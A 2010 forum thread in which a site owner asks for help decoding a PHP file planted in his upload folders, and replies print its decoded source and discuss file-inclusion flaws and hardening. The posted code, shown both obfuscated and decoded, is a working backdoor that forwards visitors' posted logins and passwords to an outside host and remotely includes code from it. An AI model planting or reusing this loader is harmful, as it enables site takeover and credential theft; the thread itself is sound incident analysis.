Page 1 of 1

Help in decoding XSS Script

Posted: Tue Aug 10, 2010 12:51 am
by prasant4u
A few days ago my forum had xss attack.. i found .htaccess and two random named php file ( like base.php , create.php ) injected in my every 777 upload folders... I am curious to know what code they used.. can someone decode this code please. thanks in advance.

Code: Select all

<?php error_reporting(0);$p="bfdhgzzazbzej";eval(base64_decode("class newhttp{
var $fullurl; var $p_url; var $conn_id; var $flushed; var $mode = 4; var $defmode; var $redirects = 0; var $binary; var $options; var $stat = array('dev' => 0,'ino' => 0,'mode' => 0,'nlink' => 1,'uid' => 0,'gid' => 0,'rdev' => -1,'size' => 0,'atime' => 0,'mtime' => 0,'ctime' => 0,'blksize' => -1,'blocks' => 0);
function error($msg='not connected') { if ($this->options & STREAM_REPORT_ERRORS) { trigger_error($msg, E_USER_WARNING); } return false; }
function stream_open($path, $mode, $options, $opened_path) { $this->fullurl = $path; $this->options = $options; $this->defmode = $mode; $url = parse_url($path); if (empty($url['host'])) { return $this->error('missing host name'); } $this->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2); if (!$this->conn_id) { return false; } if (empty($url['path'])) { $url['path'] = '/'; } $this->p_url = $url; $this->flushed = false; if ($mode[0] != 'r' || (strpos($mode, '+') !== false)) { $this->mode += 2; } $this->binary = (strpos($mode, 'b') !== false); $c = $this->context(); if (!isset($c['method'])) { stream_context_set_option($this->context, 'http', 'method', 'GET'); } if (!isset($c['header'])) { stream_context_set_option($this->context, 'http', 'header', ''); } if (!isset($c['user_agent'])) { stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent')); } if (!isset($c['content'])) { stream_context_set_option($this->context, 'http', 'content', ''); } if (!isset($c['max_redirects'])) { stream_context_set_option($this->context, 'http', 'max_redirects', 5); } return true; }
function stream_close() { if ($this->conn_id) { fclose($this->conn_id); $this->conn_id = null; } }
function stream_read($bytes) { if (!$this->conn_id) { return $this->error(); } if (!$this->flushed && !$this->stream_flush()) { return false; } if (feof($this->conn_id)) { return ''; } $bytes = max(1,$bytes); if ($this->binary) { return fread($this->conn_id, $bytes); } else { return fgets($this->conn_id, $bytes); } }
function stream_write($data) { if (!$this->conn_id) { return $this->error(); } if (!$this->mode & 2) { return $this->error('Stream is in read-only mode'); } $c = $this->context(); stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST')); if (stream_context_set_option($this->context, 'http', 'content', $c['content'].$data)) { return strlen($data); } return 0; }
function stream_eof() { if (!$this->conn_id) { return true; } if (!$this->flushed) { return false; } return feof($this->conn_id); }
function stream_seek($offset, $whence) { return false; }
function stream_tell() { return 0; }
function stream_flush() { if ($this->flushed) { return false; } if (!$this->conn_id) { return $this->error(); } $c = $this->context(); $this->flushed = true; $RequestHeaders = array($c['method'].' '.$this->p_url['path'].(empty($this->p_url['query']) ? '' : '?'.$this->p_url['query']).' HTTP/1.0', 'HOST: '.$this->p_url['host'], 'User-Agent: '.$c['user_agent'].' StreamReader' ); if (!empty($c['header'])) { $RequestHeaders[] = $c['header']; } if (!empty($c['content'])) { if ($c['method'] == 'PUT') { $RequestHeaders[] = 'Content-Type: '.($this->binary ? 'application/octet-stream' : 'text/plain'); } else { $RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded'; } $RequestHeaders[] = 'Content-Length: '.strlen($c['content']); } $RequestHeaders[] = 'Connection: close'; if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders)."\r\n\r\n") === false) { return false; } if (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false) { return false; } global $http_response_header; $http_response_header = fgets($this->conn_id, 300); $data = rtrim($http_response_header); preg_match('#.* ([0-9]+) (.*)#i', $data, $head); if (($head[1] >= 301 && $head[1] <= 303) || $head[1] == 307) { $data = rtrim(fgets($this->conn_id, 300)); while (!empty($data)) { if (strpos($data, 'Location: ') !== false) { $new_location = trim(str_replace('Location: ', '', $data)); break; } $data = rtrim(fgets($this->conn_id, 300)); } trigger_error($this->fullurl.' '.$head[2].': '.$new_location, E_USER_NOTICE); $this->stream_close(); return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush()); } $data = rtrim(fgets($this->conn_id, 1024)); while (!empty($data)) { $http_response_header .= $data."\r\n"; if (strpos($data,'Content-Length: ') !== false) { $this->stat['size'] = trim(str_replace('Content-Length: ', '', $data)); } elseif (strpos($data,'Date: ') !== false) { $this->stat['atime'] = strtotime(str_replace('Date: ', '', $data)); } elseif (strpos($data,'Last-Modified: ') !== false) { $this->stat['mtime'] = strtotime(str_replace('Last-Modified: ', '', $data)); } $data = rtrim(fgets($this->conn_id, 1024)); } if ($head[1] >= 400) { trigger_error($this->fullurl.' '.$head[2], E_USER_WARNING); return false; } if ($head[1] == 304) { trigger_error($this->fullurl.' '.$head[2], E_USER_NOTICE); return false; } return true; }
function stream_stat() { $this->stream_flush(); return $this->stat; }
function dir_opendir($path, $options) { return false; }
function dir_readdir() { return ''; }
function dir_rewinddir() { return ''; }
function dir_closedir() { return; }
function url_stat($path, $flags) { return array(); }
function context() { if (!$this->context) { $this->context = stream_context_create(); } $c = stream_context_get_options($this->context); return (isset($c['http']) ? $c['http'] : array()); }
}if(isset($_POST["l"]) and isset($_POST["p"])){if(isset($_POST["input"])){$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));}else{$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];}}else{$user_auth="";}if(!isset($_POST["log_flg"])){$log_flg="&log";}
$rkht=1;if(version_compare(PHP_VERSION,'5.2','>=')){if(ini_get('allow_url_include')){$rkht=1;}else{$rkht=0;}}
if($rkht==1){if(ini_get('allow_url_fopen')){$rkht=1;}else{$rkht=0;}}
$v=$p.base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv("REMOTE_ADDR")))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]).$user_auth.$log_flg;
if($rkht==1){if(!@include_once(base64_decode("aHR0cDovLw==").$v)){}}
else{stream_wrapper_register('http2','newhttp');if(!@include_once(base64_decode("aHR0cDI6Ly8=").$v)){}}")); ?>

Re: Help in decoding XSS Script

Posted: Tue Aug 10, 2010 12:56 am
by Mordred
Simple: replace eval with print
Also, this is not XSS, it's either compromised FTP or a compromised upload script.

Re: Help in decoding XSS Script

Posted: Tue Aug 10, 2010 1:14 am
by prasant4u
Tnx for your reply.. so is this means they got my ftp details ? now i ve moved from mod_php to fcgi ( with apache suexec enabled ) So now my upload folders have 755 permission. only 777 folders could have this type of security probs ?

if possible plz decode some lines for me... i can't get it...

Re: Help in decoding XSS Script

Posted: Thu Aug 12, 2010 2:36 pm
by Sephern

Code: Select all

<?php
class newhttp{
var $fullurl;
var $p_url; 
var $conn_id; 
var $flushed; 
var $mode = 4; 
var $defmode; 
var $redirects = 0; 
var $binary; 
var $options; 
var $stat = array('dev' => 0,'ino' => 0,'mode' => 0,'nlink' => 1,'uid' => 0,'gid' => 0,'rdev' => -1,'size' => 0,'atime' => 0,'mtime' => 0,'ctime' => 0,'blksize' => -1,'blocks' => 0);
function error($msg='not connected') { 
	if ($this->options & STREAM_REPORT_ERRORS)
	{ 
		trigger_error($msg, E_USER_WARNING);
	}
	return false;
}
function stream_open($path, $mode, $options, $opened_path) { 
	$this->fullurl = $path; 
	$this->options = $options; 
	$this->defmode = $mode; 
	$url = parse_url($path); 
	if (empty($url['host'])) 
	{
		return $this->error('missing host name');
 	}
	$this->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2);
	if (!$this->conn_id)
	{
		return false;
	}
	if (empty($url['path'])) 
	{ 
		$url['path'] = '/';
	}
	$this->p_url = $url;
	$this->flushed = false;
	if ($mode[0] != 'r' || (strpos($mode, '+') !== false))
	{ 
		$this->mode += 2;
	}
	$this->binary = (strpos($mode, 'b') !== false); 
	$c = $this->context(); 
	if (!isset($c['method'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'method', 'GET');
	}
	if (!isset($c['header']))
	{ 
		stream_context_set_option($this->context, 'http', 'header', '');
	} 
	if (!isset($c['user_agent'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent'));
 	} 
	if (!isset($c['content'])) 
	{
		stream_context_set_option($this->context, 'http', 'content', ''); 
	} 
	if (!isset($c['max_redirects'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'max_redirects', 5); 
	} 
	return true; 
}
function stream_close() {
	if ($this->conn_id) 
	{
		fclose($this->conn_id); 
		$this->conn_id = null;
 	} 
}
function stream_read($bytes) { 
	if (!$this->conn_id) 
	{ 
		return $this->error(); 
	} 
	if (!$this->flushed && !$this->stream_flush()) 
	{ 
		return false;
	} 
	if (feof($this->conn_id)) 
	{ 
		return ''; 
	}
	$bytes = max(1,$bytes);
	if ($this->binary) 
	{ 
		return fread($this->conn_id, $bytes); 
	} 
	else 
	{ 
		return fgets($this->conn_id, $bytes); 
	} 
}
function stream_write($data) { 
	if (!$this->conn_id) 
	{ 
		return $this->error();
	} 
	if (!$this->mode & 2) 
	{ 
		return $this->error('Stream is in read-only mode'); 
	} 
	$c = $this->context(); 
	stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST'));
	if (stream_context_set_option($this->context, 'http', 'content', $c['content'].$data)) 
	{ 
		return strlen($data);
	} 
	return 0; 
}
function stream_eof() { 
	if (!$this->conn_id) 
	{ 
		return true; 
	} 
	if (!$this->flushed) 
	{ 
		return false;
	} 
	return feof($this->conn_id);
}
function stream_seek($offset, $whence) { //lolwut? Bit of a pointless function? ~Sephern 
	return false; 
}
function stream_tell() { 
	return 0; 
}
function stream_flush() { 
	if ($this->flushed) 
	{ 
		return false; 
	} 
	if (!$this->conn_id) 
	{ 
		return $this->error(); 
	} 
	$c = $this->context();
	$this->flushed = true; 
	$RequestHeaders = array($c['method'].' '.$this->p_url['path'].(empty($this->p_url['query']) ? '' : '?'.$this->p_url['query']).' HTTP/1.0', 'HOST: '.$this->p_url['host'], 'User-Agent: '.$c['user_agent'].' StreamReader' );
	if (!empty($c['header'])) 
	{ 
		$RequestHeaders[] = $c['header'];
	} 
	if (!empty($c['content'])) 
	{ 
		if ($c['method'] == 'PUT') 
		{ 
			$RequestHeaders[] = 'Content-Type: '.($this->binary ? 'application/octet-stream' : 'text/plain');
		} 
		else 
		{ 
			$RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded';
		} 
		$RequestHeaders[] = 'Content-Length: '.strlen($c['content']); } $RequestHeaders[] = 'Connection: close';
		if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders)."\r\n\r\n") === false) 
		{ 
			return false; 
		} 
		if (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false) 
		{ 
			return false; 
		} 
		global $http_response_header; 
		$http_response_header = fgets($this->conn_id, 300); 
		$data = rtrim($http_response_header); 
		preg_match('#.* ([0-9]+) (.*)#i', $data, $head); 
		if (($head[1] >= 301 && $head[1] <= 303) || $head[1] == 307) 
		{ 
			$data = rtrim(fgets($this->conn_id, 300)); 
			while (!empty($data)) 
			{ 
				if (strpos($data, 'Location: ') !== false) 
				{ 
					$new_location = trim(str_replace('Location: ', '', $data)); 
					break; 
				} 
				$data = rtrim(fgets($this->conn_id, 300));
			} 
			trigger_error($this->fullurl.' '.$head[2].': '.$new_location, E_USER_NOTICE); 
			$this->stream_close(); 
			return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush());
		} 
		$data = rtrim(fgets($this->conn_id, 1024)); 
		while (!empty($data)) 
		{ 
			$http_response_header .= $data."\r\n"; 
			if (strpos($data,'Content-Length: ') !== false) 
			{ 
				$this->stat['size'] = trim(str_replace('Content-Length: ', '', $data)); 
			} 
			elseif (strpos($data,'Date: ') !== false) 
			{ 
				$this->stat['atime'] = strtotime(str_replace('Date: ', '', $data));
			} 
			elseif (strpos($data,'Last-Modified: ') !== false) 
			{ 
				$this->stat['mtime'] = strtotime(str_replace('Last-Modified: ', '', $data));
			} 
			$data = rtrim(fgets($this->conn_id, 1024));
		} 
		if ($head[1] >= 400) 
		{ 
			trigger_error($this->fullurl.' '.$head[2], E_USER_WARNING); 
			return false; 
		} 
		if ($head[1] == 304) 
		{ 
			trigger_error($this->fullurl.' '.$head[2], E_USER_NOTICE); 
			return false; 
		} 
		return true; 
	}
}
function stream_stat() { 
	$this->stream_flush();
	return $this->stat; 
}
function dir_opendir($path, $options) { 
	return false; 
}
function dir_readdir() { 
return ''; 
}
function dir_rewinddir() { 
	return '';
}
function dir_closedir() { 
	return; 
}
function url_stat($path, $flags) { 
	return array(); 
}
function context() { 
	if (!$this->context) 
	{ 
		$this->context = stream_context_create();
	}	
	$c = stream_context_get_options($this->context); 
	return (isset($c['http']) ? $c['http'] : array()); 
}
if(isset($_POST["l"]) and isset($_POST["p"]))
{
	if(isset($_POST["input"]))
	{
		$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));
	}
	else
	{
		$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];
	}
}
else
{
	$user_auth="";
}
if(!isset($_POST["log_flg"]))
{
	$log_flg="&log";
}
$rkht=1;
if(version_compare(PHP_VERSION,'5.2','>='))
{
	if(ini_get('allow_url_include'))
	{
		$rkht=1;
	}
	else
	{
		$rkht=0;
	}
}
if($rkht==1)
{
	if(ini_get('allow_url_fopen'))
	{
		$rkht=1;
	}
	else
	{
		$rkht=0;
	}
}
$v=$p.base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv("REMOTE_ADDR")))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]).$user_auth.$log_flg;
if($rkht==1)
{
	if(!@include_once(base64_decode("aHR0cDovLw==").$v))
	{
	}
}
else
{
	stream_wrapper_register('http2','newhttp');
	if(!@include_once(base64_decode("aHR0cDI6Ly8=").$v))
	{
	}
}
?>
Decoded and tabulated for your viewing pleasure.

It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.

Re: Help in decoding XSS Script

Posted: Fri Aug 13, 2010 1:52 am
by Mordred
Sephern wrote: It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.
Agreed, I did not mean that these are all the possibilities.
The script BTW looks that it wants to do a RFI, but nothing in it explains how it appeared on the server, so LFI is not a final diagnosis either.

Re: Help in decoding XSS Script

Posted: Sat Aug 14, 2010 12:12 am
by prasant4u
Thanks everyone for your help.. :) i ve disabled url_include function in server

Re: Help in decoding XSS Script

Posted: Sun Aug 15, 2010 10:12 am
by Sephern
Mordred wrote:
Sephern wrote: It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.
Agreed, I did not mean that these are all the possibilities.
The script BTW looks that it wants to do a RFI, but nothing in it explains how it appeared on the server, so LFI is not a final diagnosis either.
Tnx for your reply.. so is this means they got my ftp details ? now i ve moved from mod_php to fcgi ( with apache suexec enabled ) So now my upload folders have 755 permission. only 777 folders could have this type of security probs ?
755 is read and execute, is it not?
If files from the 'upload' folder are included, and had PHP code in, then it'd explain how it was shell'd.

Re: Help in decoding XSS Script

Posted: Mon Aug 16, 2010 3:28 am
by Mordred
I didn't say your diagnosis was wrong, only that it wasn't the only possible one.